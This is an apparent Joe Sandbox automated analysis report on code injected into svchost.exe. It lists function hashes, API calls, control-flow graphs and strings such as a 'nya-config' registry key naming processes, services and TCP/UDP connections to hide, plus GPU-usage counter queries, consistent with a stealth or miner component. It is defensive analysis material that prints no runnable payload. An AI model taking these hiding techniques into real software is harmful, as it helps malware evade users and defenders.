                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: 5f1f564115a3c2f07b4922df6e2128082fd153148bbbb057b57b51238e2adea1
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: 14118B29E28701BAFBE8BFE0EB2C39B23B0A758345F404835860681182DEFCC458C202

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 67 22f4b923f88-22f4b923f93 68 22f4b923f95-22f4b923fa8 StrCmpNIW 67->68 69 22f4b923fad-22f4b923fb4 67->69 68->69 70 22f4b923faa 68->70 70->69
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $nya-
                                                  • API String ID: 0-1266920357
                                                  • Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                  • Instruction ID: 7c511189d8bd023de34a560d2ec103ce2a25d726894c4c52d98c75f0c23c25be
                                                  • Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                  • Instruction Fuzzy Hash: BBD05E29F21706ABFBA8AFE1EEE86A26370DB08B04F485032DA0001101DB988D9EC710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 1a342e552356d2e1af5ce3fa28535de16e2ccce78197f29e3b350a65e4913c9f
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: A191477AF0125097EBA0AF65D608F7EB3A1F744B96F548131AF490778AEA38D853C710

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0000022F4B921724: GetProcessHeap.KERNEL32 ref: 0000022F4B92172F
                                                    • Part of subcall function 0000022F4B921724: HeapAlloc.KERNEL32 ref: 0000022F4B92173E
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217AE
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217DB
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9217F5
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921815
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921830
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921850
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92186B
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92188B
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9218A6
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9218C6
                                                  • SleepEx.KERNELBASE ref: 0000022F4B921BDF
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9218E1
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921901
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92191C
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92193C
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921957
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921977
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921992
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92199C
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: 3929e908c5efdb50802740529e7f9fb41309619d651063b853838cf7facbc3eb
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: E1319C5DE00665A1FB98BFE7D76936B23B4A744BC0F0458319F0987797DE98C4B0C214

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 214 22f4b922ff0-22f4b923069 216 22f4b92306f-22f4b923075 214->216 217 22f4b923384-22f4b9233a7 214->217 216->217 218 22f4b92307b-22f4b92307e 216->218 218->217 219 22f4b923084-22f4b923087 218->219 219->217 220 22f4b92308d-22f4b92309d GetModuleHandleA 219->220 221 22f4b9230b1 220->221 222 22f4b92309f-22f4b9230af GetProcAddress 220->222 223 22f4b9230b4-22f4b9230d2 221->223 222->223 223->217 225 22f4b9230d8-22f4b9230f7 StrCmpNIW 223->225 225->217 226 22f4b9230fd-22f4b923101 225->226 226->217 227 22f4b923107-22f4b923111 226->227 227->217 228 22f4b923117-22f4b92311e 227->228 228->217 229 22f4b923124-22f4b923137 228->229 230 22f4b923139-22f4b923145 229->230 231 22f4b923147 229->231 232 22f4b92314a-22f4b92314e 230->232 231->232 233 22f4b923150-22f4b92315c 232->233 234 22f4b92315e 232->234 235 22f4b923161-22f4b92316b 233->235 234->235 236 22f4b923251-22f4b923255 235->236 237 22f4b923171-22f4b923174 235->237 238 22f4b923376-22f4b92337e 236->238 239 22f4b92325b-22f4b92325e 236->239 240 22f4b923186-22f4b923190 237->240 241 22f4b923176-22f4b923183 call 22f4b921a30 237->241 238->217 238->229 244 22f4b92326f-22f4b923279 239->244 245 22f4b923260-22f4b92326c call 22f4b921a30 239->245 242 22f4b923192-22f4b92319f 240->242 243 22f4b9231c4-22f4b9231ce 240->243 241->240 242->243 247 22f4b9231a1-22f4b9231ae 242->247 248 22f4b9231d0-22f4b9231dd 243->248 249 22f4b9231fe-22f4b923201 243->249 251 22f4b9232a9-22f4b9232ac 244->251 252 22f4b92327b-22f4b923288 244->252 245->244 256 22f4b9231b1-22f4b9231b7 247->256 248->249 257 22f4b9231df-22f4b9231ec 248->257 259 22f4b92320f-22f4b92321c lstrlenW 249->259 260 22f4b923203-22f4b92320d call 22f4b921cc4 249->260 254 22f4b9232b9-22f4b9232c6 lstrlenW 251->254 255 22f4b9232ae-22f4b9232b7 call 22f4b921cc4 251->255 252->251 261 22f4b92328a-22f4b923297 252->261 265 22f4b9232d9-22f4b9232e3 call 22f4b923f88 254->265 266 22f4b9232c8-22f4b9232d7 call 22f4b921cfc 254->266 255->254 281 22f4b9232ee-22f4b9232f9 255->281 263 22f4b923247-22f4b92324c 256->263 264 22f4b9231bd-22f4b9231c2 256->264 267 22f4b9231ef-22f4b9231f5 257->267 270 22f4b92322f-22f4b923241 call 22f4b923f88 259->270 271 22f4b92321e-22f4b92322d call 22f4b921cfc 259->271 260->259 260->263 269 22f4b92329a-22f4b9232a0 261->269 275 22f4b9232e6-22f4b9232e8 263->275 264->243 264->256 265->275 266->265 266->281 267->263 278 22f4b9231f7-22f4b9231fc 267->278 280 22f4b9232a2-22f4b9232a7 269->280 269->281 270->263 270->275 271->263 271->270 275->238 275->281 278->249 278->267 280->251 280->269 286 22f4b923370-22f4b923374 281->286 287 22f4b9232fb-22f4b9232ff 281->287 286->238 288 22f4b923301-22f4b923305 287->288 289 22f4b923307-22f4b923321 call 22f4b933a40 287->289 288->289 291 22f4b923324-22f4b923327 288->291 289->291 293 22f4b923329-22f4b923347 call 22f4b933a40 291->293 294 22f4b92334a-22f4b92334d 291->294 293->294 294->286 296 22f4b92334f-22f4b92336d call 22f4b933a40 294->296 296->286
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 147cdcf82202d8e0471ff3581cefa6d14657757d9480307097532bc8ead48c1b
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: E0B1D429E14690AAFB9CAFA5D62835B63B4F744B84F405436DF0953796DFB8CD40C341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: 5eede67ed12d608bc06b41e83df98e201cc61c4a372c92de6e6655074c48d11c
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 1D318176A04B8096EBA4AFA0E8A43DE7370F788744F44443ADB4D47B99EFB8C548C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: b9e4fb152665ba47da9891cea323b39acc5666c2d8f9b080be451602521d2c89
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 8F41BB3AA04B80A6EBA0DF64E89439F73B0F788754F500535EB8D46B9ADFB8C555CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: c7a4973126e1821149b9bb57efd12384a65569e6dc40a33e3ade57d1bdd71235
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 73A1F72AF0468069FBA4EFB5D6683AF6BB0AB45794F184535DF4427BD6CABCC041E700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 166e6a7cf8ca6ae22d1d2167cc4d7dbb97e4619db1cdf95cc15371901a208e22
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 0F71302AB10E50A6EB90AFE5E9A865A2374FB49B88F402531DF4D4372ADF79C464C340

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 5fd594a0b7fa2e6d6a870a4b8be9315c5f609ef8c5858b0e1febb8391929093b
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 99515A36A00B84A6EBA4EFA2E66835A77B1F78CB88F448134DB4947719DF7CC459C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 667aa4a931bf1db41e538e731fbbbe72ea80eb3c72d69248ee73dd534c18d3f0
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 59519029F0160461FA98AF96EA687A73270AB49BB0F584B349F3D473D2DBBCC445C740

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 54bb57bfbac15d22c730a9ae4bf4d5dcc13813a5c375ca13860c46240ad27539
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 6631B326E04A40AAFBA5EF92EA1835BA3B0F78CBC5F4445349F4943626DFBCC555C340

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 65eec3c7316b9ca877189915c2b978696c90943607defc846abed2c99c45d4dd
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: B6319129E14B01AAF794EF92EA68B1A63B0F788F84F0455359F4E43726DFB8C845C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: 350ed3b2226708ae4edfa82662d5c9b4d7a5033190cc26238961e0a1e2b44f09
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: AED1AF3AA00744A6EBA0EFA5D58879E77B0F755799F100135EF8957B9BEB74C082C700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 330 22f4b92a22c-22f4b92a294 call 22f4b92b144 333 22f4b92a6f5-22f4b92a6fb call 22f4b92c388 330->333 334 22f4b92a29a-22f4b92a29d 330->334 334->333 335 22f4b92a2a3-22f4b92a2a9 334->335 337 22f4b92a2af-22f4b92a2b3 335->337 338 22f4b92a378-22f4b92a38a 335->338 337->338 342 22f4b92a2b9-22f4b92a2c4 337->342 340 22f4b92a390-22f4b92a394 338->340 341 22f4b92a645-22f4b92a649 338->341 340->341 343 22f4b92a39a-22f4b92a3a5 340->343 345 22f4b92a682-22f4b92a68c call 22f4b929324 341->345 346 22f4b92a64b-22f4b92a652 341->346 342->338 344 22f4b92a2ca-22f4b92a2cf 342->344 343->341 349 22f4b92a3ab-22f4b92a3af 343->349 344->338 350 22f4b92a2d5-22f4b92a2df call 22f4b929324 344->350 345->333 356 22f4b92a68e-22f4b92a6ad call 22f4b928070 345->356 346->333 347 22f4b92a658-22f4b92a67d call 22f4b92a6fc 346->347 347->345 353 22f4b92a575-22f4b92a581 349->353 354 22f4b92a3b5-22f4b92a3f0 call 22f4b929704 349->354 350->356 364 22f4b92a2e5-22f4b92a310 call 22f4b929324 * 2 call 22f4b929a0c 350->364 353->345 357 22f4b92a587-22f4b92a58b 353->357 354->353 368 22f4b92a3f6-22f4b92a3ff 354->368 361 22f4b92a58d-22f4b92a599 call 22f4b9299cc 357->361 362 22f4b92a59b-22f4b92a5a3 357->362 361->362 377 22f4b92a5bc-22f4b92a5c4 361->377 362->345 367 22f4b92a5a9-22f4b92a5b6 call 22f4b9295a4 362->367 397 22f4b92a312-22f4b92a316 364->397 398 22f4b92a330-22f4b92a33a call 22f4b929324 364->398 367->345 367->377 373 22f4b92a403-22f4b92a435 368->373 374 22f4b92a568-22f4b92a56f 373->374 375 22f4b92a43b-22f4b92a447 373->375 374->353 374->373 375->374 379 22f4b92a44d-22f4b92a46c 375->379 380 22f4b92a5ca-22f4b92a5ce 377->380 381 22f4b92a6d8-22f4b92a6f4 call 22f4b929324 * 2 call 22f4b92c2f4 377->381 383 22f4b92a472-22f4b92a4af call 22f4b9299e0 * 2 379->383 384 22f4b92a558-22f4b92a55d 379->384 385 22f4b92a5e1 380->385 386 22f4b92a5d0-22f4b92a5df call 22f4b9299cc 380->386 381->333 410 22f4b92a4e2-22f4b92a4e5 383->410 384->374 393 22f4b92a5e3-22f4b92a5ed call 22f4b92b1dc 385->393 386->393 393->345 408 22f4b92a5f3-22f4b92a643 call 22f4b929634 call 22f4b929838 393->408 397->398 402 22f4b92a318-22f4b92a323 397->402 398->338 413 22f4b92a33c-22f4b92a35c call 22f4b929324 * 2 call 22f4b92b1dc 398->413 402->398 407 22f4b92a325-22f4b92a32a 402->407 407->333 407->398 408->345 416 22f4b92a4b1-22f4b92a4d7 call 22f4b9299e0 call 22f4b92a96c 410->416 417 22f4b92a4e7-22f4b92a4ee 410->417 435 22f4b92a373 413->435 436 22f4b92a35e-22f4b92a368 call 22f4b92b2cc 413->436 432 22f4b92a4f9-22f4b92a556 call 22f4b92a158 416->432 433 22f4b92a4d9-22f4b92a4dc 416->433 421 22f4b92a55f 417->421 422 22f4b92a4f0-22f4b92a4f4 417->422 423 22f4b92a564 421->423 422->383 423->374 432->423 433->410 435->338 440 22f4b92a6d2-22f4b92a6d7 call 22f4b92c2f4 436->440 441 22f4b92a36e-22f4b92a6d1 call 22f4b928f84 call 22f4b92ad28 call 22f4b929178 436->441 440->381 441->440
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
